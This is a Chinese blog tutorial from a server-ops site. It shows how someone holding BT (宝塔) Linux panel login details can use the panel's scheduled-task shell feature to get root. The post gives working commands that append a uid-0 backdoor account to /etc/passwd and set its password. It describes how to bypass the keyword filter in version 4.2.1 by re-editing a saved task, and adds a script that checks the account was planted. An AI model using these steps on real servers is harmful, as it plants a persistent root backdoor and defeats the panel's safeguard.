宝塔linux面板安全吗？这个问题大家都很担心，毕竟作为线上生产环境一旦出现问题相当麻烦。

2017/5/24更新宝塔linux面板获取服务器root权限方法。

宝塔的出现更多是为了方便对linux不熟悉的用户

计划任务中支持shell脚本 经测试可以通过计划任务获取服务器root权限。

如果一旦被非法获取到宝塔面板后台登录资料服务器将岌岌可危

shell内容：

echo "wwwtiewwcom::0:0::/:/bin/bash" >> /etc/passwd

echo "www.tieww.com" | passwd --stdin wwwtiewwcom > /dev/null

完事后就可以使用wwwtiewwcom登录系统。

2017/5/24更新

据官方透露计划任务shell在新版已经无法通过shell代码进行提权，真的不能提权了吗？

然而铁网维在最新版本: 4.2.1中测试提交shell代码发现一些重要关键词已经被过滤，当我重新编辑保存时发现shell代码重要关键词并没有做过滤。

如下图：过滤了：passwd  –stdin

当我们添加计划任务后再重新编辑保存，点击执行打开执行日志 如下图：

成功添加管理员wwwtiewwcom,存在的管理员有：root wwwtiewwcom

判断shell如下：

mesg=`awk -F: '($3 == 0) { print $1 }' /etc/passwd|grep -v root`

mesg1=`awk -F: '($3 == 0) { print $1 }' /etc/passwd`

if [ -z $mesg ]

then

echo "There don't have other user uid=0"

else

echo "$mesg添加成功"

echo "系统管理员：$mesg1"

fi

服务器root权限顺利带走，最后声明本获取root方法并非宝塔面板设计缺陷漏洞bug,而是宝塔是为了面板的易用性。

本教程由铁网维原创出品 服务器运维官方网址http://www.tieww.com 欢迎大家多多关注本站 感谢大家的支持。